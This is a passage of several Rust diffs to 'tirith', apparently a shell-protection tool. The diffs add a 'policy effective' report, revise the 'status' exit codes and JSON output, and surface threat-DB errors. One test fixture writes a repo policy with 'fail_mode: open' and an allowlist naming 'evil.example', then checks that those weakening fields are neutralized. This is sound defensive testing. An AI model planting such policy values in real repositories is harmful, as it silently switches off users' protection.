+        Err(e) => {
+            eprintln!("  (could not render effective policy as YAML: {e})");
+        }
+    }
+    eprintln!();
+
+    let neutralized = &info.policy.neutralized_fields;
+    match info.scope {
+        PolicyScope::Repo if !neutralized.is_empty() => {
+            eprintln!(
+                "  Neutralized (this repo policy is tightening-only; these weakening fields \
+                 were ignored): {}",
+                neutralized.join(", ")
+            );
+        }
+        PolicyScope::Repo => {
+            eprintln!("  No weakening fields — this repo policy only tightens.");
+        }
+        _ => {
+            eprintln!("  Operator-scoped policy — all fields honored (nothing neutralized).");
+        }
+    }
+
+    0
+}
+
 #[derive(serde::Serialize)]
 struct PolicyTrace {
     policy_path: Option<String>,
@@ -1139,5 +1280,61 @@ mod tests {
         assert!(!p.allow_bypass_env_noninteractive);
         assert!(!p.approval_rules.is_empty());
         assert!(!p.escalation.is_empty());
+    }
+
+    /// `policy effective` transparency contract: for a REPO-scoped policy that
+    /// declares a weakening field (a non-empty `allowlist`), the gathered data
+    /// must name the source path, classify the scope as `repo`, and list
+    /// `allowlist` among the neutralized fields (repo policies are tightening-
+    /// only). Drives [`gather_effective`] directly so no stdout capture is
+    /// needed — the renderer is a thin function of these fields.
+    #[test]
+    fn effective_repo_scope_lists_neutralized_allowlist() {
+        use crate::cli::test_harness::{with_fake_env, EnvGuard};
+
+        with_fake_env(true, |_home, cwd| {
+            let cwd = cwd.expect("cwd set");
+            // Isolate machine-level policy sources so only our repo policy is
+            // discovered (these are not faked by `with_fake_env`).
+            let _root = EnvGuard::remove("TIRITH_POLICY_ROOT");
+            let _xdg = EnvGuard::remove("XDG_CONFIG_HOME");
+
+            // A repo checkout: `.git` makes the walk-up stamp PolicyScope::Repo,
+            // which triggers repo-scope sanitization of the weakening `allowlist`.
+            std::fs::create_dir_all(cwd.join(".git")).unwrap();
+            std::fs::create_dir_all(cwd.join(".tirith")).unwrap();
+            std::fs::write(
+                cwd.join(".tirith/policy.yaml"),
+                "fail_mode: open\nallowlist:\n  - evil.example\n",
+            )
+            .unwrap();
+
+            let info = gather_effective(cwd.to_str());
+
+            // Source path: the repo-root policy we just wrote.
+            let expected_path = cwd.join(".tirith/policy.yaml").display().to_string();
+            assert_eq!(
+                info.source_path.as_deref(),
+                Some(expected_path.as_str()),
+                "effective must name the repo-root policy as the source",
+            );
+
+            // Scope: repo (and its lowercase label).
+            assert_eq!(info.scope, tirith_core::policy::PolicyScope::Repo);
+            assert_eq!(scope_label(info.scope), "repo");
+
+            // The weakening `allowlist` was neutralized AND recorded — this is the
+            // drop list `policy effective` surfaces.
+            assert!(
+                info.policy.neutralized_fields.contains(&"allowlist"),
+                "allowlist must be listed as neutralized for a repo policy; got {:?}",
+                info.policy.neutralized_fields,
+            );
+            // And the value itself was actually reset to tightening-only default.
+            assert!(
+                info.policy.allowlist.is_empty(),
+                "the repo allowlist must be reset (neutralized), not honored",
+            );
+        });
     }
 }

--- a/crates/tirith/src/cli/prompt_status.rs
+++ b/crates/tirith/src/cli/prompt_status.rs
@@ -257,18 +257,25 @@ pub(crate) fn protection_mode_from_status(status: Option<&str>) -> String {
 
 /// Protection posture classified for an exit-code contract. Built from the
 /// `protection_mode` string [`protection_mode_from_status`] emits plus whether a
-/// shell hook is actually configured — `"off"` splits into [`HookMissing`]
-/// (nothing wired up) versus [`Off`] (hook present but inactive). Drives the new
-/// `tirith status` exit code; `prompt-status` stays always-0.
+/// shell hook is configured. A manually-run `tirith status` is an EXTERNAL process
+/// that sees only EXPORTED env: a protected shell's live mode lives in the
+/// deliberately-non-exported `TIRITH_STATUS`, and only bash re-exports it (as
+/// `TIRITH_BASH_EFFECTIVE_PROTECTION`). So a missing live signal does NOT prove
+/// "unprotected": `"off"` with a configured hook is [`ConfiguredUnknown`] (live
+/// mode unverifiable here, exit 0), and only `"off"` with NO hook is
+/// [`HookMissing`] (a real failure). Drives the new `tirith status` exit code;
+/// `prompt-status` stays always-0.
 ///
 /// [`HookMissing`]: ProtectionHealth::HookMissing
-/// [`Off`]: ProtectionHealth::Off
+/// [`ConfiguredUnknown`]: ProtectionHealth::ConfiguredUnknown
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
 pub(crate) enum ProtectionHealth {
     Guarded,
     WarnOnly,
     Degraded,
-    Off,
+    /// Hook configured, but this external process can't see the live per-shell
+    /// mode (it's non-exported; only bash re-exports it). Not provably off.
+    ConfiguredUnknown,
     HookMissing,
     Unknown,
 }
@@ -285,20 +292,26 @@ impl ProtectionHealth {
             "guarded" => Self::Guarded,
             "warn-only" => Self::WarnOnly,
             "degraded" => Self::Degraded,
-            "off" if !hook_configured => Self::HookMissing,
-            "off" => Self::Off,
+            // No live mode signal. A protected shell's TIRITH_STATUS is
+            // non-exported, so an external `tirith status` legitimately sees "off"
+            // even when protected — a CONFIGURED hook is not provably off (exit 0);
+            // only a MISSING hook is a real failure.
+            "off" if hook_configured => Self::ConfiguredUnknown,
+            "off" => Self::HookMissing,
             _ => Self::Unknown,
         }
     }
 
-    /// Exit-code contract: `0` only when actively blocking ([`Guarded`]); every
-    /// other posture (warn-only, degraded, off, hook-missing, unknown) is `1` so
-    /// callers can fail CI / prompts on anything less than full protection.
+    /// Exit-code contract: `0` when actively blocking ([`Guarded`]) OR when the
+    /// hook is configured but the live mode is unverifiable from this external
+    /// process ([`ConfiguredUnknown`] — not provably off). Every PROVABLY-reduced
+    /// posture (warn-only, degraded, hook-missing, unknown) is `1`.
     ///
     /// [`Guarded`]: Self::Guarded
+    /// [`ConfiguredUnknown`]: Self::ConfiguredUnknown
     pub(crate) fn exit_code(self) -> i32 {
         match self {
-            Self::Guarded => 0,
+            Self::Guarded | Self::ConfiguredUnknown => 0,
             _ => 1,
         }
     }
@@ -309,7 +322,7 @@ impl ProtectionHealth {
             Self::Guarded => "guarded",
             Self::WarnOnly => "warn-only",
             Self::Degraded => "degraded",
-            Self::Off => "off",
+            Self::ConfiguredUnknown => "configured",
             Self::HookMissing => "hook-missing",
             Self::Unknown => "unknown",
         }
@@ -599,15 +612,19 @@ mod tests {
         assert_eq!(warn_only, ProtectionHealth::WarnOnly);
         assert_eq!(warn_only.exit_code(), 1);
 
-        // "off" splits on hook_configured.
+        // "off" splits on hook_configured. With NO hook it is a real failure.
         let hook_missing = ProtectionHealth::classify("off", false);
         assert_eq!(hook_missing, ProtectionHealth::HookMissing);
         assert_eq!(hook_missing.exit_code(), 1);
         assert_eq!(hook_missing.label(), "hook-missing");
 
-        let off = ProtectionHealth::classify("off", true);
-        assert_eq!(off, ProtectionHealth::Off);
-        assert_eq!(off.exit_code(), 1);
+        // With a CONFIGURED hook, "off" only means the live mode is invisible to
+        // this external process (TIRITH_STATUS is non-exported) — not provably off,
+        // so it does NOT fail the exit code.
+        let configured = ProtectionHealth::classify("off", true);
+        assert_eq!(configured, ProtectionHealth::ConfiguredUnknown);
+        assert_eq!(configured.exit_code(), 0);
+        assert_eq!(configured.label(), "configured");
 
         let degraded = ProtectionHealth::classify("degraded", true);
         assert_eq!(degraded, ProtectionHealth::Degraded);

--- a/crates/tirith/src/cli/prompt_status.rs
+++ b/crates/tirith/src/cli/prompt_status.rs
@@ -602,13 +602,13 @@ mod tests {
 
     #[test]
     fn protection_health_classify_and_exit_codes() {
-        // Guarded is the only posture that exits 0 (actively blocking).
+        // Guarded exits 0 (actively blocking); ConfiguredUnknown also exits 0 (see below).
         let guarded = ProtectionHealth::classify("guarded", true);
         assert_eq!(guarded, ProtectionHealth::Guarded);
         assert_eq!(guarded.exit_code(), 0);
         assert_eq!(guarded.label(), "guarded");
 
-        // Everything else exits 1.
+        // Provably-reduced postures (warn-only, degraded, hook-missing, unknown) exit 1.
         let warn_only = ProtectionHealth::classify("warn-only", true);
         assert_eq!(warn_only, ProtectionHealth::WarnOnly);
         assert_eq!(warn_only.exit_code(), 1);

--- a/crates/tirith/src/cli/prompt_status.rs
+++ b/crates/tirith/src/cli/prompt_status.rs
@@ -284,7 +284,8 @@ impl ProtectionHealth {
     /// Map a `protection_mode` string (same vocabulary as
     /// [`protection_mode_from_status`]) plus `hook_configured` to a health.
     /// `"off"` resolves to [`HookMissing`](Self::HookMissing) when no hook is
-    /// configured, otherwise [`Off`](Self::Off). Anything outside the known
+    /// configured, otherwise [`ConfiguredUnknown`](Self::ConfiguredUnknown).
+    /// Anything outside the known
     /// vocabulary (including values passed through verbatim) is
     /// [`Unknown`](Self::Unknown).
     pub(crate) fn classify(protection_mode: &str, hook_configured: bool) -> Self {

--- a/crates/tirith/src/cli/prompt_status.rs
+++ b/crates/tirith/src/cli/prompt_status.rs
@@ -255,6 +255,67 @@ pub(crate) fn protection_mode_from_status(status: Option<&str>) -> String {
     }
 }
 
+/// Protection posture classified for an exit-code contract. Built from the
+/// `protection_mode` string [`protection_mode_from_status`] emits plus whether a
+/// shell hook is actually configured — `"off"` splits into [`HookMissing`]
+/// (nothing wired up) versus [`Off`] (hook present but inactive). Drives the new
+/// `tirith status` exit code; `prompt-status` stays always-0.
+///
+/// [`HookMissing`]: ProtectionHealth::HookMissing
+/// [`Off`]: ProtectionHealth::Off
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub(crate) enum ProtectionHealth {
+    Guarded,
+    WarnOnly,
+    Degraded,
+    Off,
+    HookMissing,
+    Unknown,
+}
+
+impl ProtectionHealth {
+    /// Map a `protection_mode` string (same vocabulary as
+    /// [`protection_mode_from_status`]) plus `hook_configured` to a health.
+    /// `"off"` resolves to [`HookMissing`](Self::HookMissing) when no hook is
+    /// configured, otherwise [`Off`](Self::Off). Anything outside the known
+    /// vocabulary (including values passed through verbatim) is
+    /// [`Unknown`](Self::Unknown).
+    pub(crate) fn classify(protection_mode: &str, hook_configured: bool) -> Self {
+        match protection_mode {
+            "guarded" => Self::Guarded,
+            "warn-only" => Self::WarnOnly,
+            "degraded" => Self::Degraded,
+            "off" if !hook_configured => Self::HookMissing,
+            "off" => Self::Off,
+            _ => Self::Unknown,
+        }
+    }
+
+    /// Exit-code contract: `0` only when actively blocking ([`Guarded`]); every
+    /// other posture (warn-only, degraded, off, hook-missing, unknown) is `1` so
+    /// callers can fail CI / prompts on anything less than full protection.
+    ///
+    /// [`Guarded`]: Self::Guarded
+    pub(crate) fn exit_code(self) -> i32 {
+        match self {
+            Self::Guarded => 0,
+            _ => 1,
+        }
+    }
+
+    /// Stable lowercase label for human/JSON output.
+    pub(crate) fn label(self) -> &'static str {
+        match self {
+            Self::Guarded => "guarded",
+            Self::WarnOnly => "warn-only",
+            Self::Degraded => "degraded",
+            Self::Off => "off",
+            Self::HookMissing => "hook-missing",
+            Self::Unknown => "unknown",
+        }
+    }
+}
+
 /// Test-only `pub(crate)` shim exposing the real env-reading
 /// `detect_protection_mode` to `cli::doctor`'s cross-module agreement test.
 /// Caller sets `TIRITH_STATUS` under the shared env lock.
@@ -523,6 +584,40 @@ mod tests {
         unsafe {
             std::env::remove_var("TIRITH_STATUS");
         }
+    }
+
+    #[test]
+    fn protection_health_classify_and_exit_codes() {
+        // Guarded is the only posture that exits 0 (actively blocking).
+        let guarded = ProtectionHealth::classify("guarded", true);
+        assert_eq!(guarded, ProtectionHealth::Guarded);
+        assert_eq!(guarded.exit_code(), 0);
+        assert_eq!(guarded.label(), "guarded");
+
+        // Everything else exits 1.
+        let warn_only = ProtectionHealth::classify("warn-only", true);
+        assert_eq!(warn_only, ProtectionHealth::WarnOnly);
+        assert_eq!(warn_only.exit_code(), 1);
+
+        // "off" splits on hook_configured.
+        let hook_missing = ProtectionHealth::classify("off", false);
+        assert_eq!(hook_missing, ProtectionHealth::HookMissing);
+        assert_eq!(hook_missing.exit_code(), 1);
+        assert_eq!(hook_missing.label(), "hook-missing");
+
+        let off = ProtectionHealth::classify("off", true);
+        assert_eq!(off, ProtectionHealth::Off);
+        assert_eq!(off.exit_code(), 1);
+
+        let degraded = ProtectionHealth::classify("degraded", true);
+        assert_eq!(degraded, ProtectionHealth::Degraded);
+        assert_eq!(degraded.exit_code(), 1);
+
+        // Anything outside the known vocabulary is Unknown (hook flag irrelevant).
+        let unknown = ProtectionHealth::classify("futureValue", true);
+        assert_eq!(unknown, ProtectionHealth::Unknown);
+        assert_eq!(unknown.exit_code(), 1);
+        assert_eq!(unknown.label(), "unknown");
     }
 
     #[test]

--- a/crates/tirith/src/cli/status.rs
+++ b/crates/tirith/src/cli/status.rs
@@ -107,14 +107,7 @@ fn status_json(
 }
 
 fn scope_label(s: tirith_core::policy::PolicyScope) -> &'static str {
-    use tirith_core::policy::PolicyScope::*;
-    match s {
-        Repo => "repo",
-        User => "user",
-        Org => "org",
-        Remote => "remote",
-        Default => "default",
-    }
+    s.as_str()
 }
 
 fn threatdb_summary(t: &threatdb_cmd::ThreatDbStatus) -> String {

--- a/crates/tirith/src/cli/status.rs
+++ b/crates/tirith/src/cli/status.rs
@@ -3,9 +3,11 @@
 //! Builds on the cheap `doctor --quick` gather (protection mode + hook + policy)
 //! and adds policy SCOPE and threat-DB freshness. Unlike the poller-safe
 //! `doctor --quick` (which always exits 0 for the VS Code extension), `status`
-//! carries the exit-code contract: it exits NON-ZERO whenever protection is not
-//! actively blocking (warn-only / degraded / off / hook-missing), so a CI step or
-//! a wary user gets a hard signal that they are not fully protected.
+//! carries an exit-code contract: it exits NON-ZERO when protection is PROVABLY
+//! reduced (warn-only / degraded / no hook), and 0 when actively blocking OR when a
+//! configured hook's live mode is not visible to this external process (only bash
+//! re-exports it). A CI step or wary user gets a hard signal on a real downgrade,
+//! without a false alarm on a protected shell whose live mode it cannot see.
 
 use crate::cli::doctor;
 use crate::cli::prompt_status::ProtectionHealth;

--- a/crates/tirith/src/cli/status.rs
+++ b/crates/tirith/src/cli/status.rs
@@ -27,20 +27,14 @@ pub fn run(json: bool) -> i32 {
     let tdb = threatdb_cmd::gather_status();
 
     if json {
-        let out = serde_json::json!({
-            "protection_mode": quick.protection_mode,
-            "health": health.label(),
-            "protected": health == ProtectionHealth::Guarded,
-            "hook_configured": quick.hook_configured,
-            "policy_path": quick.policy_path_used,
-            "policy_scope": scope,
-            "threat_db": {
-                "installed": tdb.installed,
-                "age_hours": tdb.age_hours,
-                "stale": tdb.stale,
-                "signature_valid": tdb.signature_valid,
-            },
-        });
+        let out = status_json(
+            &quick.protection_mode,
+            health,
+            scope,
+            quick.policy_path_used.as_deref(),
+            quick.hook_configured,
+            &tdb,
+        );
         match serde_json::to_string_pretty(&out) {
             Ok(s) => println!("{s}"),
             Err(e) => {
@@ -83,6 +77,35 @@ pub fn run(json: bool) -> i32 {
     health.exit_code()
 }
 
+/// Build the `status --json` envelope. A pure seam (no env, no I/O) so the
+/// JSON shape — the contract a CI step or the VS Code extension parses — is unit
+/// testable. Field values mirror the human path exactly; `threat_db.error`
+/// surfaces a corrupt/unreadable DB instead of silently rendering it "unsigned".
+fn status_json(
+    mode: &str,
+    health: ProtectionHealth,
+    scope: Option<&str>,
+    policy_path: Option<&str>,
+    hook_configured: bool,
+    tdb: &threatdb_cmd::ThreatDbStatus,
+) -> serde_json::Value {
+    serde_json::json!({
+        "protection_mode": mode,
+        "health": health.label(),
+        "protected": health == ProtectionHealth::Guarded,
+        "hook_configured": hook_configured,
+        "policy_path": policy_path,
+        "policy_scope": scope,
+        "threat_db": {
+            "installed": tdb.installed,
+            "age_hours": tdb.age_hours,
+            "stale": tdb.stale,
+            "signature_valid": tdb.signature_valid,
+            "error": tdb.error.as_deref(),
+        },
+    })
+}
+
 fn scope_label(s: tirith_core::policy::PolicyScope) -> &'static str {
     use tirith_core::policy::PolicyScope::*;
     match s {
@@ -97,6 +120,9 @@ fn scope_label(s: tirith_core::policy::PolicyScope) -> &'static str {
 fn threatdb_summary(t: &threatdb_cmd::ThreatDbStatus) -> String {
     if !t.installed {
         return "not installed (run `tirith threat-db update`)".to_string();
+    }
+    if let Some(err) = t.error.as_deref() {
+        return format!("ERROR: {err} (run `tirith threat-db update --force`)");
     }
     let age = t
         .age_hours
@@ -121,5 +147,219 @@ fn health_reason(h: ProtectionHealth) -> &'static str {
         }
         ProtectionHealth::HookMissing => "the shell hook is not configured (run `tirith init`)",
         ProtectionHealth::Unknown => "protection state could not be determined",
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::cli::test_harness::{EnvGuard, ENV_LOCK};
+
+    /// A deterministic, "not installed" [`ThreatDbStatus`] used as a functional
+    /// update base. `ThreatDbStatus` has private fields (and no `Default`), so a
+    /// literal can't be written from this sibling module; instead we drive
+    /// `gather_status()` down its not-installed early return by pointing
+    /// `TIRITH_THREATDB_PATH` at a path that doesn't exist. That sets every field
+    /// to a known empty value, and tests override the public ones via `..base`.
+    fn tdb_base() -> threatdb_cmd::ThreatDbStatus {
+        let _lock = ENV_LOCK.lock().unwrap_or_else(|p| p.into_inner());
+        let dir = tempfile::tempdir().expect("tempdir for threat-db base");
+        let missing = dir.path().join("no-such-threat-db.bin");
+        let _guard = EnvGuard::set("TIRITH_THREATDB_PATH", &missing);
+        let base = threatdb_cmd::gather_status();
+        assert!(
+            !base.installed,
+            "base fixture must be not-installed; got installed=true \
+             (a real DB leaked past TIRITH_THREATDB_PATH)"
+        );
+        base
+    }
+
+    /// `status --json` carries EXACTLY the documented top-level key set and the
+    /// `threat_db` sub-object carries EXACTLY its documented keys (including the
+    /// `error` key added so a corrupt DB isn't silently shown as "unsigned").
+    /// This is the parse contract for CI steps and the VS Code extension.
+    #[test]
+    fn status_json_has_exactly_the_documented_fields() {
+        let tdb = threatdb_cmd::ThreatDbStatus {
+            installed: true,
+            age_hours: Some(12.0),
+            signature_valid: Some(true),
+            stale: false,
+            error: None,
+            ..tdb_base()
+        };
+        let v = status_json(
+            "guarded",
+            ProtectionHealth::Guarded,
+            Some("repo"),
+            Some("/repo/.tirith/policy.yaml"),
+            true,
+            &tdb,
+        );
+        let obj = v.as_object().expect("status JSON is an object");
+        let mut keys: Vec<&str> = obj.keys().map(String::as_str).collect();
+        keys.sort_unstable();
+        assert_eq!(
+            keys,
+            [
+                "health",
+                "hook_configured",
+                "policy_path",
+                "policy_scope",
+                "protected",
+                "protection_mode",
+                "threat_db",
+            ],
+            "status JSON must carry exactly the documented top-level field set"
+        );
+
+        let tdb_obj = obj["threat_db"]
+            .as_object()
+            .expect("threat_db is an object");
+        let mut tdb_keys: Vec<&str> = tdb_obj.keys().map(String::as_str).collect();
+        tdb_keys.sort_unstable();
+        assert_eq!(
+            tdb_keys,
+            [
+                "age_hours",
+                "error",
+                "installed",
+                "signature_valid",
+                "stale",
+            ],
+            "threat_db must carry exactly its documented field set (incl. error)"
+        );
+
+        // Field types are the contract downstream parsers rely on.
+        assert!(obj["protected"].is_boolean(), "protected must be bool");
+        assert!(
+            obj["hook_configured"].is_boolean(),
+            "hook_configured must be bool"
+        );
+        assert!(
+            obj["protection_mode"].is_string(),
+            "protection_mode must be a string"
+        );
+        assert!(obj["health"].is_string(), "health must be a string");
+        assert!(
+            obj["policy_path"].is_string() || obj["policy_path"].is_null(),
+            "policy_path must be a string or null"
+        );
+        assert!(
+            obj["policy_scope"].is_string() || obj["policy_scope"].is_null(),
+            "policy_scope must be a string or null"
+        );
+        assert!(
+            tdb_obj["installed"].is_boolean(),
+            "threat_db.installed must be bool"
+        );
+        assert!(
+            tdb_obj["stale"].is_boolean(),
+            "threat_db.stale must be bool"
+        );
+        assert!(
+            tdb_obj["signature_valid"].is_boolean() || tdb_obj["signature_valid"].is_null(),
+            "threat_db.signature_valid must be bool or null"
+        );
+        assert!(
+            tdb_obj["age_hours"].is_number() || tdb_obj["age_hours"].is_null(),
+            "threat_db.age_hours must be a number or null"
+        );
+        assert!(
+            tdb_obj["error"].is_string() || tdb_obj["error"].is_null(),
+            "threat_db.error must be a string or null"
+        );
+    }
+
+    /// Optional top-level fields serialize to JSON `null` (not absent) when their
+    /// source is `None`, and `error` is `null` on a healthy DB.
+    #[test]
+    fn status_json_nulls_for_absent_optionals() {
+        let tdb = threatdb_cmd::ThreatDbStatus {
+            installed: true,
+            age_hours: Some(1.0),
+            signature_valid: Some(true),
+            stale: false,
+            error: None,
+            ..tdb_base()
+        };
+        let v = status_json(
+            "off",
+            ProtectionHealth::HookMissing,
+            None,
+            None,
+            false,
+            &tdb,
+        );
+        assert!(v["policy_path"].is_null(), "absent policy_path → JSON null");
+        assert!(
+            v["policy_scope"].is_null(),
+            "absent policy_scope → JSON null"
+        );
+        assert!(
+            v["threat_db"]["error"].is_null(),
+            "healthy DB → threat_db.error is null"
+        );
+    }
+
+    /// A not-installed DB renders the install hint.
+    #[test]
+    fn threatdb_summary_not_installed() {
+        let summary = threatdb_summary(&tdb_base());
+        assert!(
+            summary.contains("not installed"),
+            "not-installed summary must say so: {summary:?}"
+        );
+    }
+
+    /// An installed DB with an invalid signature AND staleness renders both
+    /// markers, and never the benign "unsigned" wording.
+    #[test]
+    fn threatdb_summary_invalid_signature_and_stale() {
+        let tdb = threatdb_cmd::ThreatDbStatus {
+            installed: true,
+            age_hours: Some(720.0),
+            signature_valid: Some(false),
+            stale: true,
+            error: None,
+            ..tdb_base()
+        };
+        let summary = threatdb_summary(&tdb);
+        assert!(
+            summary.contains("SIGNATURE INVALID"),
+            "invalid signature must show SIGNATURE INVALID: {summary:?}"
+        );
+        assert!(
+            summary.contains(", STALE"),
+            "stale DB must show , STALE: {summary:?}"
+        );
+        assert!(
+            !summary.contains("unsigned"),
+            "Some(false) is invalid, not unsigned: {summary:?}"
+        );
+    }
+
+    /// A corrupt/unreadable DB (load error set) renders an ERROR line, NOT the
+    /// misleading "unsigned" — the bug this fix closes.
+    #[test]
+    fn threatdb_summary_load_error_is_error_not_unsigned() {
+        let tdb = threatdb_cmd::ThreatDbStatus {
+            installed: true,
+            age_hours: None,
+            signature_valid: None,
+            stale: true,
+            error: Some("magic mismatch: not a tirith threat-db".to_string()),
+            ..tdb_base()
+        };
+        let summary = threatdb_summary(&tdb);
+        assert!(
+            summary.contains("ERROR:"),
+            "load error must surface as ERROR: {summary:?}"
+        );
+        assert!(
+            !summary.contains("unsigned"),
+            "a corrupt DB must not be reported as unsigned: {summary:?}"
+        );
     }
 }

--- a/crates/tirith/src/cli/status.rs
+++ b/crates/tirith/src/cli/status.rs
@@ -68,10 +68,15 @@ pub fn run(json: bool) -> i32 {
     println!();
     // The verdict line: PROTECTED on stdout when guarded; otherwise the reason on
     // stderr (a security notice — always shown, never `--quiet`-gated).
-    if health == ProtectionHealth::Guarded {
-        println!("tirith: PROTECTED");
-    } else {
-        eprintln!("tirith: NOT FULLY PROTECTED — {}", health_reason(health));
+    match health {
+        ProtectionHealth::Guarded => println!("tirith: PROTECTED"),
+        // Configured, but this external process can't see the live per-shell mode
+        // (TIRITH_STATUS is non-exported; only bash re-exports it). Not provably
+        // off, so exit 0 — yet say so honestly rather than claim full protection.
+        ProtectionHealth::ConfiguredUnknown => println!(
+            "tirith: hook configured; this external check can't see the live per-shell mode\n  (only bash re-exports it, so run `tirith doctor` in your shell to confirm)"
+        ),
+        other => eprintln!("tirith: NOT FULLY PROTECTED — {}", health_reason(other)),
     }
     health.exit_code()
 }
@@ -109,7 +114,9 @@ fn health_reason(h: ProtectionHealth) -> &'static str {
         ProtectionHealth::Guarded => "protected",
         ProtectionHealth::WarnOnly => "the hook is warn-only and cannot block (TIRITH_BASH_MODE=enter or `tirith doctor --reset-bash-safe-mode`)",
         ProtectionHealth::Degraded => "protection degraded to warn-only this session (`tirith doctor --fix`)",
-        ProtectionHealth::Off => "the hook is inactive in this shell",
+        ProtectionHealth::ConfiguredUnknown => {
+            "the hook is configured but its live mode is not visible to an external check"
+        }
         ProtectionHealth::HookMissing => "the shell hook is not configured (run `tirith init`)",
         ProtectionHealth::Unknown => "protection state could not be determined",
     }

--- a/crates/tirith/src/cli/status.rs
+++ b/crates/tirith/src/cli/status.rs
@@ -1,0 +1,116 @@
+//! `tirith status` — the canonical "am I protected?" command.
+//!
+//! Builds on the cheap `doctor --quick` gather (protection mode + hook + policy)
+//! and adds policy SCOPE and threat-DB freshness. Unlike the poller-safe
+//! `doctor --quick` (which always exits 0 for the VS Code extension), `status`
+//! carries the exit-code contract: it exits NON-ZERO whenever protection is not
+//! actively blocking (warn-only / degraded / off / hook-missing), so a CI step or
+//! a wary user gets a hard signal that they are not fully protected.
+
+use crate::cli::doctor;
+use crate::cli::prompt_status::ProtectionHealth;
+use crate::cli::threatdb_cmd;
+
+pub fn run(json: bool) -> i32 {
+    let quick = doctor::gather_quick_info();
+    let health = ProtectionHealth::classify(&quick.protection_mode, quick.hook_configured);
+
+    // Active policy scope — local discovery only, never a network fetch.
+    let cwd = std::env::current_dir()
+        .ok()
+        .map(|p| p.display().to_string());
+    let scope = tirith_core::policy::discover_local_policy_path_scoped(cwd.as_deref())
+        .map(|(_, s)| scope_label(s));
+
+    let tdb = threatdb_cmd::gather_status();
+
+    if json {
+        let out = serde_json::json!({
+            "protection_mode": quick.protection_mode,
+            "health": health.label(),
+            "protected": health == ProtectionHealth::Guarded,
+            "hook_configured": quick.hook_configured,
+            "policy_path": quick.policy_path_used,
+            "policy_scope": scope,
+            "threat_db": {
+                "installed": tdb.installed,
+                "age_hours": tdb.age_hours,
+                "stale": tdb.stale,
+                "signature_valid": tdb.signature_valid,
+            },
+        });
+        match serde_json::to_string_pretty(&out) {
+            Ok(s) => println!("{s}"),
+            Err(e) => {
+                eprintln!("tirith status: failed to serialize JSON: {e}");
+                return 1;
+            }
+        }
+        return health.exit_code();
+    }
+
+    println!("tirith status");
+    println!("  protection:  {}", quick.protection_mode);
+    println!(
+        "  hook:        {}",
+        if quick.hook_configured {
+            "configured"
+        } else {
+            "NOT configured"
+        }
+    );
+    match (&quick.policy_path_used, &scope) {
+        (Some(p), Some(s)) => println!("  policy:      {p} (scope: {s})"),
+        (Some(p), None) => println!("  policy:      {p}"),
+        (None, _) => println!("  policy:      (none found)"),
+    }
+    println!("  threat db:   {}", threatdb_summary(&tdb));
+    println!();
+    // The verdict line: PROTECTED on stdout when guarded; otherwise the reason on
+    // stderr (a security notice — always shown, never `--quiet`-gated).
+    if health == ProtectionHealth::Guarded {
+        println!("tirith: PROTECTED");
+    } else {
+        eprintln!("tirith: NOT FULLY PROTECTED — {}", health_reason(health));
+    }
+    health.exit_code()
+}
+
+fn scope_label(s: tirith_core::policy::PolicyScope) -> &'static str {
+    use tirith_core::policy::PolicyScope::*;
+    match s {
+        Repo => "repo",
+        User => "user",
+        Org => "org",
+        Remote => "remote",
+        Default => "default",
+    }
+}
+
+fn threatdb_summary(t: &threatdb_cmd::ThreatDbStatus) -> String {
+    if !t.installed {
+        return "not installed (run `tirith threat-db update`)".to_string();
+    }
+    let age = t
+        .age_hours
+        .map(|h| format!("{h:.0}h old"))
+        .unwrap_or_else(|| "age unknown".into());
+    let sig = match t.signature_valid {
+        Some(true) => "signature ok",
+        Some(false) => "SIGNATURE INVALID",
+        None => "unsigned",
+    };
+    let stale = if t.stale { ", STALE" } else { "" };
+    format!("{age}, {sig}{stale}")
+}
+
+fn health_reason(h: ProtectionHealth) -> &'static str {
+    match h {
+        ProtectionHealth::Guarded => "protected",
+        ProtectionHealth::WarnOnly => "the hook is warn-only and cannot block (TIRITH_BASH_MODE=enter or `tirith doctor --reset-bash-safe-mode`)",
+        ProtectionHealth::Degraded => "protection degraded to warn-only this session (`tirith doctor --fix`)",
+        ProtectionHealth::Off => "the hook is inactive in this shell",
+        ProtectionHealth::HookMissing => "the shell hook is not configured (run `tirith init`)",
+        ProtectionHealth::Unknown => "protection state could not be determined",
+    }
+}

--- a/crates/tirith/src/cli/threatdb_cmd.rs
+++ b/crates/tirith/src/cli/threatdb_cmd.rs
@@ -526,18 +526,20 @@ pub(crate) struct ThreatDbStatus {
     pub(crate) installed: bool,
     pub(crate) path: Option<String>,
     pub(crate) age_hours: Option<f64>,
-    build_timestamp: Option<u64>,
-    build_sequence: Option<u64>,
-    package_count: Option<u32>,
-    hostname_count: Option<u32>,
-    ip_count: Option<u32>,
-    typosquat_count: Option<u32>,
-    popular_count: Option<u32>,
-    total_entries: Option<u32>,
-    skipped_range_only: Option<u32>,
+    // pub(crate) so a sibling module (e.g. status.rs tests) can build a fixture
+    // via functional-update; serialized by the derive, never weakening anything.
+    pub(crate) build_timestamp: Option<u64>,
+    pub(crate) build_sequence: Option<u64>,
+    pub(crate) package_count: Option<u32>,
+    pub(crate) hostname_count: Option<u32>,
+    pub(crate) ip_count: Option<u32>,
+    pub(crate) typosquat_count: Option<u32>,
+    pub(crate) popular_count: Option<u32>,
+    pub(crate) total_entries: Option<u32>,
+    pub(crate) skipped_range_only: Option<u32>,
     pub(crate) signature_valid: Option<bool>,
     pub(crate) stale: bool,
-    error: Option<String>,
+    pub(crate) error: Option<String>,
 }
 
 pub(crate) fn gather_status() -> ThreatDbStatus {

--- a/crates/tirith/src/cli/threatdb_cmd.rs
+++ b/crates/tirith/src/cli/threatdb_cmd.rs
@@ -23,7 +23,7 @@ static VERIFY_KEY_BYTES: &[u8; PUBLIC_KEY_LENGTH] =
 const MANIFEST_URL_PRIMARY: &str =
     "https://raw.githubusercontent.com/sheeki03/tirith/main/threatdb-manifest.json";
 const MANIFEST_URL_FALLBACK: &str =
-    "https://github.com/sheeki03/tirith/releases/latest/download/threatdb-manifest.json";
+    "https://github.com/sheeki03/tirith/releases/download/threatdb-latest/threatdb-manifest.json";
 
 const MAX_MANIFEST_SIZE: u64 = 64 * 1024;
 const MAX_DB_SIZE: u64 = 256 * 1024 * 1024;
@@ -2855,10 +2855,10 @@ mod tests {
     #[test]
     fn primary_and_fallback_independent_cache_state() {
         let tmp = tempfile::tempdir().unwrap();
-        let primary =
-            "https://raw.githubusercontent.com/sheeki03/tirith/main/threatdb-manifest.json";
